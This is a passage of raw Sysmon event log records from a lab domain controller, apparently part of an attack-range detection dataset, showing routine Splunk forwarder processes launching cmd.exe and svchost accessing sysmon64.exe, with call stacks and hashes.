Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002227Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.342{5D479F2C-16B7-5F84-6500-000000007F01}2428C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002226Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.230{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B7-5F84-6400-000000007F01}3760C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002225Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002224Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002223Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002222Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002221Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002220Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002219Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002218Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002217Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002216Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.230{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B7-5F84-6400-000000007F01}3760C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002215Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.230{5D479F2C-16B1-5F84-3000-000000007F01}26163792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B7-5F84-6400-000000007F01}3760C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002214Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.232{5D479F2C-16B7-5F84-6400-000000007F01}3760C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002213Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.121{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B7-5F84-6300-000000007F01}3780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002212Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002211Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002210Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002209Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002208Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002207Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002206Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002205Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002204Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002203Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.121{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B7-5F84-6300-000000007F01}3780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002202Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.121{5D479F2C-16B1-5F84-3000-000000007F01}26163792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B7-5F84-6300-000000007F01}3780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program 